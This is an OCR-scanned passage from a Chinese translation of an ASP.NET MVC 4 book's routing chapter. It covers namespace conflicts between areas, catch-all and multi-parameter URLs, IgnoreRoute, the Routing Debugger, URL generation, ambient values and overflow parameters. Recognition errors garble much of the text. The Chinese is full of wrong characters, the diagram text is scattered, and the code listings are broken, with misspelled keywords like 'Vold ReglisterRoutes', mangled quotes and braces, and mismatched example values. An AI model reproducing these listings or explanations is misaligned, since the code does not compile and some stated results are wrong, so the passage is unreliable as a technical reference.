中 ，Global.asax 文件 中 的 Application Start 方法 中 存在 对 AreaRegistration.RegisterAll Areas 
方法 的 调用 。 

2. 区 域 路 由 冲突 

如 条 我 们 有 两 个 相同 名 称 的 控制 右 ， 其 中 一 个 在 区 域 中 ， 另 一 个 在 应 用 程序 的 根 目 录 
下 ， 那 么 当 传 入 的 请 求 丐 配 没 有 指定 名 称 空间 的 路 由 时 ， 系 统 会 抛 出 一 个 异常 ， 并 给 出 一 
个 元 长 的 错误 提示 背 县 : 
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系统 发 现 多 个 名 为 “Home” 的 控制 器 , 可 以 用 来 匹配 该 请 求 . 如 果 响 应 该 请 求 ('{controller} 
/{action}/ {id}") 的 路 由 没有 指定 要 查找 的 、 用 来 匹配 请 求 的 控制 器 名 称 空间 , 就 可 能 会 导致 
该 异常 产生 。 如 果真 是 这 样 ， 请 调用 带 有 “namespaces” 参 数 的 “MapRoute” 方 法 的 重 载 
版 本 以 注册 该 路 由 。 

对 'Home' 的 请 求 已 经 发 现 了 下 面 匹 配 的 控制 器 : 


AreasDemoWeb.Controllers.HomeController 
AreasDemoWeb.Areas .MyArea.Controllers.HomeController 


当 使 用 Add Area 对 话 框 添加 区 域 时 , 框架 会 相应 地 在 该 区 域 的 名 称 容 间 中 为 新 区 域 注 
册 一 个 路 由 。 这 样 就 保证 只 有 新 区 域 中 的 控制 器 才能 匹配 新 路 由 。 

名 称 空间 可 以 缩小 匹配 路 由 时 控制 器 的 候选 集 。 如 果 路 由 指定 了 匹配 的 名 称 空间 ， 那 
人 么 只 有 在 这 个 名 称 空间 中 的 控制 器 才 有 可 能 与 该 路 由 匹配 。 相 反 ， 如 果 路 由 没有 指定 名 称 
宝 间 ， 和 那么 程序 中 所 有 的 控制 句 都 有 可 能 与 该 路 由 匹配 。 

在 路 由 没有 指定 名 称 空 间 的 情况 下 ， 很 容易 导致 二 义 性 ， 即 两 个 同名 的 控制 器 同时 匹 
配 一 个 路 由 。 

阻止 该 异 第 的 一 种 方法 是 ， 在 整个 项 目 中 使 用 唯一 的 控制 器 名 称 。 然 而 ， 我 们 可 能 有 
时 候 想 使 用 相同 的 控制 器 名 称 ( 例 如 ， 我 们 不 想 影 响 生 成 的 路 由 URL)。 这 种 情形 下 ， 可 以 


对 特定 的 路 由 指定 一 组 用 来 定位 控制 硕 类 的 名 称 衬 间 ， 有 具体 的 实现 如 程序 清单 9-1 所 示 : 


程序 清单 9-1: Listing 9-1.txt 


routes .MapRoute ( 


"Default™", 
"{controller}/{action}/{id}", 
new 1{ controller = "Home", action = "Index"”, id="™" 1, 
new [|] { "AreasDemoWeb.Controllers” |} 
); 


上 面 代码 使 用 第 4 个 参数 来 指定 一 个 名 称 宇 间 数组 。 从 上 面 的 代码 可 以 看 出 ， 示 例 项 
目的 控制 器 全 都 定义 在 AreasDemoWeb.Controllers 名 称 空间 中 。 


9.2.5 ”Catch-Al| 参数 


catch-all 参数 允许 路 由 匹配 具有 任意 个 段 的 URL。 参 数 中 的 值 是 不 售 查 询 字 符 串 的 
URL 的 剩余 部 分 。 


例如 ， 程 序 清单 9-2 中 的 路 由 能 够 处 理 表 9-4 中 所 示 的 请 求 。 
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程序 清单 9-2: Listing 9-2.txt 


public static void ReglisterRoutes (RouteCollection routes) 
{ 
routes.MapRoute("catchallroute", "query/{query-name}/{*extrastuff}"); 


} 
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表 9-4 程序 清单 9-2 中 的 请 求 


Se 参 数值 
/query/select/a/b/c extrastuff = "a/b/c" 
/query/select/a/b/c/ extrastuff = "a/b/ec" 
/querv/select/ extrastuff="" (路 由 仍然 匹配 ，“catch-all” 只 捕获 了 示例 中 的 空 字符 串 ) 


9.2.6 ”上段 中 的 多 个 URL 参数 


正如 前 面 提 到 的 ， 路 由 URL 的 每 个 段 中 都 可 能 含有 多 个 参数 。 例 如 ， 下 面 列 出 的 都 
是 有 效 URL: 

® {title}-{artist} 

e 人 Albumfttierandfartlst} 

e {filename!}.{ext} 

为 避免 产生 二 义 性 , 我 们 规定 参数 不 能 临近 。 例如 , 下 面 列 出 的 路 由 URL 都 是 无 效 的 : 

® {title}{artist} 

® Download!{filename} {ext} 

路 由 URL 在 与 传 入 的 请 求 中 配 时 ， 它 的 字面 值 是 与 请 求 精确 还 配 的， 而 其 中 的 URL 
参数 是 贪 禁 下 配 的 ,， 这 与 正则 表达 式 有 同样 的 含义 。 换言之 ， 路 由 使 每 个 URL 参数 都 尽 可 
能 多 地 匹配 文本 。 

例如 ， 足 由 {filename}.{ext} 是 如 何 丐 配 /asp.net.mvc.xml 请 求 的 呢 ? 如 果 {filename} 
参数 不 是 贪 禁 匹配 的 ， 那么 它 只 需 匹 配 asp， 而 由 {fext} 参 数 匹配 剩 下 的 netmvc.xml。 但 是 
因为 URL 参数 要 求 贪 殖 匹 配 , 所 以 {Elename} 参 数 会 尽 可 能 地 匹配 它 能 匹配 的 文本 一 一 asp. 
net.mvc。 它 不 能 再 匹配 更 多 的 了 ， 因 为 必须 为 .{ext} 部 分 留 下 匹配 空间 ， 即 .{ext} 匹配 URL 
的 剩余 部 分 一 xml。 

表 9-5 展示 了 各 种 这 有 多 个 参数 的 路 由 URL 匹配 请 求 的 方式 。 注意， 表 9-5 中 使 用 了 
简写 {foo=bar} 来 指明 URL 参数 {foo} 具 有 默认 值 "bar"。 


表 9-5 多 参数 路 由 URL 的 匹配 


路 由 URL 路 由 数据 的 结果 


{filename}. {ext} filename="Foo.xml" 
eXt= asSPX 

Myt{ttle}-{cat} /MyHouse-dwelling title="House" 
cat="dwellme" 


{foo!xyz{bar} /xXyzxyzxyzblah foo="XyZXyz" 
bar="blah" 


注意 在 第 一 个 示例 中 ， 当 匹配 URL“/Foo.xml.aspx” 时 ，{filename! 参 数 没 有 在 第 一 个 
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“.” 字 符 处 终止 匹配 。 否则 , 它 将 只 匹配 字符 串 “Foo.”。 相反 , 它 死 配 了 字符 串 “Foo.xml.”。 
9.2.7 StopRoutingHandler 和 lgnoreRoute 


天 认 情况 下 ， 路 由 机 制 会 忽略 那些 映射 到 磁盘 物理 文件 的 请 求 。 这 也 正 是 那些 对 文件 
(如 CSS、JPG 和 JS 文件 ) 的 请 求 被 路 由 和 忽略， 而 由 系统 正常 处 理 的 原因 。 

但 在 一 些 应 用 场合 中 ， 一 些 不 能 映射 到 磁盘 文件 的 请 求 也 不 需要 路 由 来 处 理 。 例 如 ， 
对 于 ASPNET 的 Web 资源 处 理 程 序 一 一 WebResource.axd 一 一 的 请 求 ,是 由 一 个 HTTP 处 理 
程序 来 处 理 的 ， 而 它们 并 没有 对 应 到 磁盘 上 的 文件 。 

StopRoutingHandler 可 以 使 确保 路 由 忽略 这 种 请 求 。 程序 清 单 9-3 展示 了 手动 添加 路 由 
的 方法 ， 即 通过 使 用 一 个 新 的 StopRoutingHandler 来 创建 路 由 ， 并 把 创建 的 路 由 添加 到 
RouteCollection 中 。 


程序 清单 9-3: Listing 9-3.txt 


public static Vold ReglisterRoutes (RouteCollection routes) 


{ 


routes.Add (new Route 

( 
"{resource} .axd/ {*pathIinfo}", 
new StopRoutingHandler () 

) ); 

routes.Add (new Route 


( 
"reports/{vyear}/i{month}" 
: new SomeRouteHandler() 
) ); 
} 
如 果 传 入 了 /WebResource.axd 的 请 求 ， 那 么 它 会 与 第 一 个 路 由 相 匹 配 。 因 为 第 一 个 路 
由 返回 一 个 StopRoutingHandler 对 象 , 所以 路 由 会 继续 把 该 请 求 传 递 给 标准 的 ASPNET 处 
理 程序 。 在 本 例 中 ， 最 终 将 回 到 用 于 处 理 .axd 扩展 的 标准 HTTP 处 理 程 序 。 
此 外 ， 还 有 一 种 更 简单 的 方法 可 使 路 由 机 制 忽略 一 个 指定 路 由 。 即 IgnoreRoute， 与 之 
前 看 到 的 MapRoute 类 似 ， 它 是 添加 到 RouteCollection 类 型 中 的 扩展 方法 。 该 方法 和 
MapRoute 方法 一 起 使 用 ， 可 以 方便 地 修改 程序 清单 9-3 中 的 代 人 码 ， 修 改 后 的 代 人 码 如 程序 
清单 9-4 所 示 。 


程序 清单 9-4: Listing 9-4.txt 


public static Vold RegisterRoutes (RouteCollection routes) 

{ 
routes.IgnoreRoute("{resource} .axd/{*pathIinfo}™); 
routes.MapRoute ("report-route", "reports/{year}/{month}"); 


} 
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上 述 代 码 看 起 来 更 简洁 ， 更 便于 理解 。 后 面 我 们 将 会 在 ASPNET MVC 的 很 多 地 方 看 
到 ， 使 用 MapRoute 和 IgnoreRoute 这 样 的 扩展 方法 可 让 代码 变 得 更 加 整洁 。 


9.2.8 路 由 的 调试 


过 去 路 由 的 调试 问题 很 令 人 诅 形 ， 因 为 路 由 是 被 ASPNET 的 内 部 路 由 处 理 罗 辑 解析 

的 ， 不 在 Visual Studio 断 点 的 范围 内 。 路 由 中 的 错误 会 中 断 程 序 的 运行 ， 因 为 它 可 能 调用 

-个 不 正确 或 者 根本 不 存在 的 控制 句 操 作 。 调 试问 题 可 能 更 加 令 人 困惑 ， 因 为 路 由 是 按 先 
后 顺序 匹配 的 ， 且 第 一 个 匹配 成 功 的 路 由 生效 ， 所 以 错误 可 能 不 在 路 由 定义 中 ， 而 是 该 路 
由 没有 在 路 由 列表 中 的 正确 位 置 上 。 可 喜 的 是 ， 这 一 切 令 人 泪 丧 的 调试 问题 ， 出 现在 笔者 
编写 Routing Debugger 之 前 。 

启用 Routing Debugger 后 ， 它 会 用 一 个 DebugRouteHandler 符 换 所 有 路 由 处 理 程序 。 
DebugRouteHandler 打包 了 所 有 传 入 的 请 求 ， 并 查询 路 由 表 中 的 每 一 个 路 由 ， 以 便 在 页 面 
底部 显示 路 由 的 诊断 数据 和 参数 。 

为 使 用 RouteDebugger， 只 和 需 在 Visual Studio 的 Package Manager Console 窗口 中 使 用 
NuGet 安装 即 可 ， 命 令 为 InstallPackage RouteDebugger。RouteDebugger 包 在 添加 Route 
Debugger 程序 集 的 同时 ， 也 在 web.config 文件 的 appSettings 节点 中 添加 了 一 个 设置 ， 用 来 
开局 或 禁用 路 由 调试 。 


<add key="RouteDebugger:Enabled”" Value=" 廿 rUe” /> 


只 要 局 用 Routing Debugger， 它 就 显示 从 (在 地 址 栏 中 的 ) 当 前 请 求 中 提取 的 路 由 数据 ， 
如 图 9-1 所 示 。 这 样 我 们 就 可 以 在 地 址 栏 中 输入 各 种 URL， 并 但 看 输入 的 URL 能 与 哪个 
路 由 此 配 。 在 页 和 面 确 部 ， 它 还 会 展示 一 个 包含 所 有 应 用 程序 定义 路 由 的 列表 。 这 样 我 们 就 
可 以 查看 定义 的 哪个 路 由 能 够 要 与 当前 URL 相 匹 配 。 


注意 笔者 为 Routing Debugger 提供 了 完整 资源 ， 所 以 我 们 可 以 修改 Routing 
Debugger 来 输出 任何 其 他 相关 数据 。 例如 ，Stephen Walther 使 用 Routing Debugger 
作为 Route Debugger Controller 的 基础 。 因为 Route Debugger Controller 是 在 控 
制 器 级 别 引 入 的 ,所 以 它 只 能 处 理 匹配 路 由 ,尽管 这 样 从 纯粹 的 调试 方面 减弱 
了 它 的 强大 功能 , 但 是 这 样 也 带 来 了 一 个 好 处 , 就 是 在 不 禁用 路 由 机 制 的 情况 
下 就 可 以 使 用 它 。 我 们 可 以 使 用 Route Debugger Controller 来 在 已 知 的 路 由 上 
执行 自动 测试 。 可 以 从 Stephen 的 博客 中 下 载 Route Debugger Controller， 网 址 
为 http://tinyurl.com/RouteDebuggerController., 
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al https//localhost DO = SCX|| HomePage- 
ASP.NET MVC gives you a powerful, patterns-based Way to build dynamic websites that enables a clean separation 
of concems and that gves you full control over markup tor enjoyable, agile development. ASP.NET MVC includes 
many features that enable fast TDD-friendly development for creating sophisticated applications that use the latest 
web standards. Learm more 


Add NuGet packages and Jump start your coding 
NuGet makes it easy to install and update free libranies and tools. Learn more 


Find Web Hosting 
You can easily find a web hosting company that offers the nght mx of features and pncee for your applications. 


和 s 2012 - My ASP NET MVC Apolcation 


Route Debugger 


TY¥pe in a ur in the address bar te see which defirned routes mateh 证 A (“eatchall}y route s added te the list of 
routes automatically in case none ef your routes mateh. 


To generate URLs using routing, supply route values via the gquery string. example: heepi//localhose: 14290/? 
二 二 


Matched Route: {controller}/{action}/{id} 


Route Data Data Tolens 
Key Walue Key Value 
eontroller Home 


etion Index 


All Routes 
Matches 
Current Wri Defaults Constraints DataTokens 
Request 


{resource} .axd/ 


Fals 
Se {"pathinfsy 


(null) [empty) (null] 


False 


id = (empty) (empty) 


apl/{contraller}/ 
{id} 


{controller}/ controller = Home, actlon = ; 
{actlon}/{id} Index, id = Urlparameter,Optional (emMPtY} (empty] 


"catehall} (null) (null) (mull) 
Current Request Info 
AppRelativeCurrentExecutlionFilaepath Is the portion of the request that Routing acts of,. 


AppRelativeCurrentExecutioenFilePath: ~/ 


9.3 ”揭秘 路 由 如 何 生 成 URL 


到 目前 为 止 ， 本 章 已 经 重点 介绍 了 路 由 如 何 匹配 传 入 的 请 求 URL， 这 是 路 由 的 一 个 主 
要 职责 。 路 由 机 制 另 一 个 主要 职责 是 构造 与 特定 路 由 对 应 的 URL。 在 生成 URL 时 ， 生 成 
URL 的 请 求 应 该 首先 与 选择 用 来 生成 URL 的 路 由 相 匹配 。 这 样 路 由 就 可 以 在 处 理 传 入 传 
出 URL 时 成 为 一 个 完整 的 双 同 系统 。 


产品 小 组 的 话 
我 们 不 妨 花 点 时 间 仔 细 揣 摩 两 句 话 :“ 在 生成 URL 时 , 生成 URL 的 请 求 应 该 首先 与 选 
择 用 来 生成 URL 的 路 由 相 匹 配 。 这 样 路 由 就 可 以 在 处 理 传 入 或 传 出 的 URL 时 成 为 一 个 完 
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整 的 双 同 系统 。” 这 两 句 话 使 得 路 由 和 URL 重 写 之 间 的 区 别 变 得 清晰 。 让 路 由 系统 生成 URL 
不 仅 分 离 了 模型 、 视 图 和 控制 器 之 间 的 关注 点 ， 同 时 也 分 离 了 功能 强大 但 默默 无 闻 的 第 4 
方 一 一 路 由 一 一 的 关注 点 。 


原则 上 ， 开 发 人 员 应 该 提供 一 组 路 由 值 ， 以 便 路 由 系统 从 中 选择 第 一 个 能 够 无 配 URL 
的 路 由 。 


9.3.1 URL 生成 的 高 层次 概述 


路 由 核心 是 一 个 非常 简单 的 算法 ， 该 算法 基于 一 个 由 了 RouteCollection 类 和 RouteBase 类 组 
成 的 简单 抽象 对 象 。 在 深入 学 习 路 由 如 何 与 复杂 Route 类 交互 之 前 ， 我 们 首先 学 习 下 路 由 
是 如 何 使 用 这 些 类 的 。 

可 以 采用 多 种 方法 来 生成 URL， 但 这 些 方法 都 以 调用 一 个 RouteCollection.GetVirtualPath 
的 重 载 方法 而 结束 。RouteCollection.GetVirtualPath 方法 共有 两 个 重 载 版 本 ， 下 面 的 代码 展 
示 了 它们 的 方法 签名 : 

public VirtualPathData GetVirtualPath (RequestContext requestContext， 

RouteValueDictionary values) 


public VirtualPathData GetVirtualPath (RegquestContext requestContext, 
string name, RouteValueDictionary values) 


第 一 个 重 载 版 本 接收 当前 的 RequestContext， 以 及 由 用 户 指 定 的 路 由 值 ( 字 上 典 )。 

(1) 路 由 集合 通过 Route.GetVirtualPath 方法 遍历 每 个 路 由 并 询问 :“ 您 可 以 生成 给 定 参 
数 的 URL 吗 ”。 这 个 过 程 类 似 于 在 路 由 与 传 入 请 求 丐 配 时 所 运用 的 匹配 逻辑 。 

(2) 如 果 一 个 路 由 可 以 应 答 ( 即 匹配 ) 上 面 的 问题 ， 那 么 它 就 返回 一 个 包含 了 URL 的 
VirtualPathData 实例 以 及 其 他 匹配 信息 。 否 则 ， 它 就 返回 空 值 ， 路 由 机 制 移 向 列表 中 的 下 
-个 路 由 。 

第 二 个 重 载 版 本 接收 三 个 参数 ， 其 中 第 二 个 参数 是 路 由 名 称 。 在 路 由 集合 中 路 由 名 称 
是 唯一 的 ， 也 就 是 说 ， 没 有 两 个 不 同 的 路 由 具有 相同 的 名 称 。 当 指定 了 路 由 名 称 时 ， 路 由 
集合 就 不 需要 循环 遍历 每 个 路 由 。 相 反 ， 它 可 以 立即 找到 指定 名 称 的 路 由 ， 并 移 向 上 面 的 
步骤 (2)。 如 果 找 到 的 路 由 不 能 匹配 指定 的 参数 ，Route.GetVirtualPath 方法 就 会 返回 空 值 ， 
并 且 不 再 匹配 其 他 路 由 。 

9.3.2 URL 生成 详解 
Ronute 类 提供 了 前 面 高 层次 算法 的 具体 实现 。 


简单 示例 

这 是 大 部 分 开发 人 员 在 使 用 路 由 机 制 时 过 到 的 逻辑 ， 下 面 对 其 进行 详细 阐述 ; 

(1) 开发 人 员 调 用 像 Html.ActionLink 或 UrlLAction 之 类 的 方法 ， 这 些 方法 反 过 来 再 调 
用 RouteCollection.GetVirtualPath 方法 ， 并 向 它 传 递 一 个 RequestContext 对 象 、 一 个 包含 值 
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的 字典 以 及 用 来 选择 生成 URL 的 路 由 名 称 ( 可 选 参数 )。 

(2) 路 由 机 制 查 看 要 求 的 路 由 URL 参数 ( 即 没 有 提供 URL 参数 的 默认 值 ), 并 确保 提供 
的 路 由 值 字 和 典 为 每 一 个 要 求 的 参数 提供 一 个 值 。 否 则 ，UREL 生成 程序 会 立即 停止 ， 并 返回 
空 值 。 

(3) 一 些 路 由 可 能 包含 没有 对 应 URL 参数 的 默认 值 。 例如， 路 由 可 能 为 category 键 提 
供 一 个 默认 值 "pastries", 但 是 category 不 是 路 由 URL 的 一 个 参数 。 这 种 情况 下 ， 如 果 用 户 
传 入 的 路 由 值 字 典 为 category 提供 了 一 个 值 ， 那 么 该 值 必 须 匹 配 category 的 默认 值 。 图 9-2 
展示 了 一 个 流程 图 示例 。 

(4) 路 由 系统 然后 应 用 路 由 的 约束 ， 如 果 有 的 话 ， 则 要 和 奉 找 约束 ， 请 参阅 图 9-3。 

(5) 路 由 匹配 成 功 ! 现在 可 以 通过 查看 每 一 个 URL 参数 ， 并 尝试 利用 字典 中 的 对 应 值 
填充 相应 参数 ， 进 而 生成 URL。 


RouteCollection.GetVirtualPath( 提 供 的 值 ) 三 一 ee 本 
_ 一 | 必需 的 参数 是 指 没 有 提供 默认 值 


pe 的 URL 参 数 
加 .也 a 示例 
ee < 路 由 URL= {action}/{type]l 
参数 吗 : 恒 Defaults = type="list" 
ee faction} 是 必需 的 ， 因 为 它 没 有 默 
AN | 认 值 ， 但 ftype} 不 是 必需 的 ， 因 
和 


为 它 具 有 默认 值 


GetVirtualPath 方 法 的 调用 
为 每 个 必需 的 参数 指定 值 


丁 吗 ? 


不 匹配 


路 由 为 URL 中 没有 出 现 的 参数 提供 默认 /| 路 由 URL {foo}/{bar} 
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中 没有 出 现 feontroller} 参 数 


| 


否 | 默认 值 (如果 指 定 的 话 ) | 一 一 
与 指定 的 值 匹配 四 ? 人、 


图 9-2 


Pa 
一 


二 fp 7 1/ 
~ 1 如 果 用 户 提 供 foo="anything"， 
Fa Ee i A | 文 是 必需 间 Wy 二 Sa 
URL = {foo}/{bar} \ 人 ee 需 的 ) 没 有 指定 
detaults = foo=xyz, controller=home AN 用 户 需要 指定 
i 和 色 | | 站 可 = 
其 中 controller=home 是 默 愉 的 " 但 URL foo="valuel" 日 bar="value2" 


一 路 由 URL = todo/f{action! 
Defaults = controller=home 
action=lndex 


“~ 用 户 指定 controller="blahy 


Ion= anvthin 
controller="home" 
action="any"” 一 个 [下 瑟 
action='any"” ”一 > 不 匹配 
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路 由 有 约束 吗 ? 


是 


一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 下 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 


对 于 每 个 约束 


约束 实现 了 
IRouteConstraint 吗 ? 


如 果 路 由 是 字符 串 ， 那 么 把 它 
看 成 正则 式 ， 正 则 式 匹配 吗 ? 


F 一 一 :一 一 一 一 一 一 一 一 一 一 一 一 一 :一 一 一 一 一 一 :一 一 一 一 一 一 :一 一 一 一 一 一 一 :一 一 一 


匹配 所 有 约束 


获得 匹配 ! 使 用 对 应 值 蔡 代 每 个 


URL 参数 (提供 的 值 或 默认 值 ) 
图 9-3 


9.3.3 外界 路 由 值 


在 一 些 情形 中 ，URL 生成 程序 还 可 以 利用 那些 不 是 显 式 提供 给 GetVirtualPath 方法 的 
值 。 下 面 让 我 们 看 一 个 示例 : 


简单 示例 


假如 现在 想 展示 一 个 大 的 任务 列表 。 我 们 想 让 用 户 通 过 链接 一 页 一 页 地 浏览 任务 ， 而 


不 是 将 任务 同时 全 都 展现 在 页 面 上 。 例 如 ， 图 9-4 展示 了 一 个 简单 的 包含 任务 列表 的 用 户 
界面 ， 该 任务 列表 可 用 于 逐 页 浏览 任务 。 

Previous 和 Next 按钮 分 别 用 来 导航 到 前 一 页 和 下 一 页 , 但 所 有 这 些 请 求 都 由 相同 的 控 
制 融 和 操作 来 处 理 。 

下 面 的 路 由 会 处 理 这 些 请 求 : 

Public static void ReglsterRoutes (RouteCollection routes) 

{ 


routes.MapRoute ("tasks", "{controller}/{action}/{page}", 
new Ticontroller="tasks", actlion="l1ist", page=0 1}); 
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http://localhost PD 7 CX Home Page - My ASP,,, % | | yu 


| My Tasks 
" say hello to Bnan 
" Spy on Lo's 
*。 Talk to Peter 


" Tease Chris 


< Drevious next > 


图 9-4 
为 了 生成 导航 到 前 一 页 和 下 一 页 的 链接 , 通常 需要 在 路 由 中 指定 所 有 的 URL 参数 。 
为 了 链接 到 页 面 2， 可 能 在 视图 中 使 用 下 面 的 代码 : 


QHtml .ActionLink ("Page 2"， "List™, 
new {controller="tasks", action="List", page = 过 上) 


然而 我 们 可 以 利用 外 界 路 由 值 来 缩短 这 些 代 人 码 。 下 面 是 请 求 任 务 列表 
/tasks/list/2 
该 请 求 的 路 由 数据 如 表 9-6 所 未 。 

表 9-6 ”路 由 数据 


键 值 
Controller tasks 
Action List 
Pagpe 2 


为 了 生成 下 一 页 的 URL， 只 需 在 新 请 求 中 指定 将 要 改变 的 路 由 数据 : 


QHtml .ActionLink("Page 2", "List", new { page 21}) 


尽管 对 ActionLink 方法 的 调用 只 提供 了 page 参数 ， 但 是 在 执行 路 由 查找 时 ， 路 由 


机 制 可 以 使 用 为 控制 器 和 操作 提供 的 外 界 路 由 数据 值 。 对 于 当前 请 求 而 言 ，RouteData 
中 的 外 界 值 就 是 这 些 参 数 的 当前 值 。 当 然 ， 显 式 地 为 控制 融和 操作 提供 的 值 会 覆 新 外 
寞 但 。 


为 在 生成 URL 时 不 设置 外 值 , 可 在 参数 字典 中 指定 key, 并 它 的 值 设置 成 null 或 空 串 。 


第 9 章 路 由 


溢出 参数 
溢出 参数 (overflow parameters) 指 在 URL 生成 过 程 中 使 用 但 没有 在 路 由 定义 中 指定 的 
路 由 值 。 显 而 易 见 ， 它 具体 指 的 是 路 由 的 URL、 默 认 字 典 和 约束 字典 。 注 意外 界 值 从 没有 


作为 洲 出 参数 使 用 。 
在 路 由 生成 过 程 中 ， 使 用 的 流出 参数 会 作为 查询 字符 串 参 数 附加 在 生成 的 URL 之 后 。 
这 种 情形 下 ， 示 例 是 最 能 说 明 问题 的 。 假 设 定义 了 下 面 的 默认 路 由 : 


public static Vold ReglsterRoutes (RouteCollection routes) 


{ 
routes .MapRoute ( 
"Default™, 
"{controller}/{action}/{id}™", 
new { controller = "Home"”, action = "Index", 
1Q = UrlParameter.Optional } 
); 
} 


现在 假设 要 使 用 上 面 定 义 的 路 由 生成 一 个 URL, 于 是 我 们 同 其 中 传递 了 一 个 额外 的 路 
由 值 一 一 page=2。 注 意 ， 上 和 面 的 路 由 定义 中 不 包括 名 为 “page” 的 URL 参数 。 在 本 例 中 ， 
我 们 只 是 使 用 Url.RouteUrl 方法 泻 染 了 URL， 而 不 是 生成 链接 : 


QUrl.RouteUrl (new {controller="Report", action="List", page="123"}) 


上 上述 代码 生成 的 URL 是 /Report/List?page=2。 正 如 看 到 的 ， 我 们 指定 的 参数 要 足以 匹 
配 默认 路 由 。 事 实 上 ， 上 面 代 码 中 指定 的 参数 比 需要 的 要 多 。 在 这 种 情形 下 ， 那 些 额外 的 
参数 会 作为 查询 字符 串 参 数 附 加 到 生成 的 URL 之 后 。 需 要 记 住 的 是 : 路 由 系统 在 选择 匹 
配 的 路 由 时 并 不 是 精确 地 匹配 。 它 只 是 选择 尽量 (足够 ) 匹 配 的 路 由 。 换 言 之 ， 只 要 指定 的 
参数 满足 路 由 的 需要 ， 是 否 指定 额外 参数 则 无 关 紧 要 。 

9.3.4 Route 类 生成 URL 的 若干 示例 
假设 定义 了 下 面 的 路 由 : 


public static Vold ReglisterRoutes (object sender, EventArgs e) 
{ 
routes .MapRoute ("report™", 
"reports/{year}/{month}/{day}", 
new {day = 1} 


} 
这 里 有 一 些 按照 下 面 的 一 般 格式 ， 调 用 Url.RouteUrl 方法 后 返回 的 结果 : 
aUT1 .RouteUrl (new {paraml = valuel, parm? = value?, ..., parmN, valueN}) 


参数 及 相应 的 结果 URL 如 表 9-7 所 示 。 


239 


240 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 


表 9-7 GetVirtualPath 方法 的 参数 和 结果 URL 


CE 遇 


ear=-2007. month=1, day=12 | /reports/2007/1/12 直接 匹配 

ealI=-2007, Imnonth=1 默认 day=1 
YeaI=2007. month=1., /reports/2007/1/12?category=123 | “溢出 ”参数 进入 生成 的 URL 的 查询 
day=12, category=123 学 符 串 中 
Year=2007 没有 为 匹配 提供 足够 的 参数 


9.4 揭秘 路 由 如 何 绑 定 到 操作 


本 节 介 绍 URL 绑 定 到 控制 器 操作 的 底层 细节 ， 从 而 使 我 们 可 以 更 透彻 地 理解 其 中 的 
原理 。 此 外 ， 本 节 还 会 详细 介绍 有 关 路 由 和 MVC 的 内 容 。 

人 们 普遍 认为 路 由 只 是 ASPNET MVC 的 一 个 特性 ， 其实 这 是 一 种 错误 观点 。 事 实 上 ， 
路 由 仅 在 ASPNET MVC 1.0 的 前 期 阶段 是 ASPNET MVC 的 特性 之 一 , 经 过 在 一 段 时 间 发 
展 之 后 ， 情 况 大 有 改变 ， 路 由 超出 了 ASPNET MVC 的 范围 成 为 一 个 普遍 使 用 的 特性 。 例 
如 ，ASPNET Dynamic Data 团队 也 对 路 由 的 使 用 很 感 兴趣 ， 于 是 他 们 把 它 应 用 到 了 
ASPNET Dynamic Data 中 。 此 时 , 路 由 已 经 变 成 了 一 个 非常 通用 的 特性 , 它 既 不 包含 MVC 
的 内 部 知识 ， 也 不 依赖 于 MVC。 

为 更 好 地 理解 路 由 机 制 如 何 适 应 ASPNET 请 求 管道 ， 下 面 介 绍 路 由 请 求 的 步骤 。 


注意 ”这 里 重点 讨论 在 IIS 7( 及 其 以 上 版 本 ) 集 成 模式 中 的 路 由 机 制 .IIS 7 
传统 模式 或 IIS 6 模式 中 路 由 机 制 的 用 法 有 一 些 细微 的 差别 。 在 使 用 Visual 
Studio 内 置 的 Web 服务 器 时 ， 它 的 行为 与 IIS7 集 成 模式 非常 相似 。 


9.4.1 高 层次 请 求 的 路 由 管道 


当 ASPNET 处 理 请 求 时 ， 路 由 管道 主要 由 以 下 几 步 组 成 

(1) UrlRoutingModule 尝试 使 用 在 RouteTable 中 注册 的 路 由 匹配 当前 请 求 。 

(2) 如 果 RouteTable 中 有 一 个 路 由 成 功 丐 配 ， 路 由 模块 就 会 从 匹配 成 功 的 路 由 中 获取 
IRouteHandler 接口 对 象 。 

(3) 路 由 模块 调用 IRouteHandler 接口 的 GetHandler 方法 ， 并 返回 用 来 处 理 请 求 的 
IHttpHandler 对 和 象 。 

(4) 调用 HITP 处 理 程序 中 的 ProcessRequest 方法 ， 然 后 把 要 处 理 的 请 求 传递 给 它 。 

(5) 在 ASPNET MVC 中 ,IRouteHandler 是 MvcRouteHandler 类 的 一 个 实例 , MvcRoute 
Handler 转 而 返回 一 个 实现 了 IHttpHandler 接口 的 MvcHandler 对 象 。 返 回 的 MvcHandler 
对 象 主 要 用 来 实例 化 控制 器 ， 并 调用 该 实例 化 控制 器 上 的 操作 方法 。 
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9.4.2 ”路 由 数据 


正如 前 面部 分 提 到 的 ， 调 用 GetRouteData 方法 会 返回 一 个 RouteData 的 实例 。RouteData 
具体 是 什么 呢 ? 原来 ，RouteData 中 包含 了 关于 匹配 请 求 的 路 由 信息 。 

前 面部 分 展示 的 路 由 市 有 如 下 的 URL: {controller}/f{action}/{id} 。 当 请 求 /albums/ 
list/123 传 入 时 ， 该 路 由 就 会 尝试 匹配 传 入 的 请 求 。 如 果 [ 匹 配 成 功 ， 它 就 创建 一 个 字典 ， 其 
中 包含 了 从 URL 中 解析 出 的 信息 。 确 切 地 讲 ， 路 由 还 会 同 字 典 中 为 URL 中 的 每 个 URL 

以 上 面 的 路 由 为 例 ， 因 为 它 的 URL 为 {controller}/{action}/{id}， 所 以 在 创建 的 字典 中 
应 该 至 少 包 含 三 个 键 , 分 别 是 controller、 action 和 id。 如果 传 入 的 URL 是 对 /albums/list/123 
的 请 求 ， 路 由 就 会 解析 该 请 求 的 URL， 并 为 字典 的 键 提供 值 。 本 例 中 ,字典 中 “controller” 
键 的 值 为 albums、“action” 键 的 值 为 ist、“id” 键 的 值 是 123。 

在 整个 MVC 中 都 有 用 到 的 RequestContext 的 RouteData 属性 保存 着 外 界 路 由 值 。 


9.5 目 定 义 路 由 约束 


前 面 的 9.2.2 市 中 已 经 详细 介绍 了 如 何 使 用 正则 表达 式 来 对 路 由 匹配 进行 细 粒 上 度 的 控 
制 。 正 如 前 面 讲 到 的 ，RoutevalueDictionary 类 是 一 个 由 字符 串 / 对 象 对 组 成 的 字典 。 当 字符 
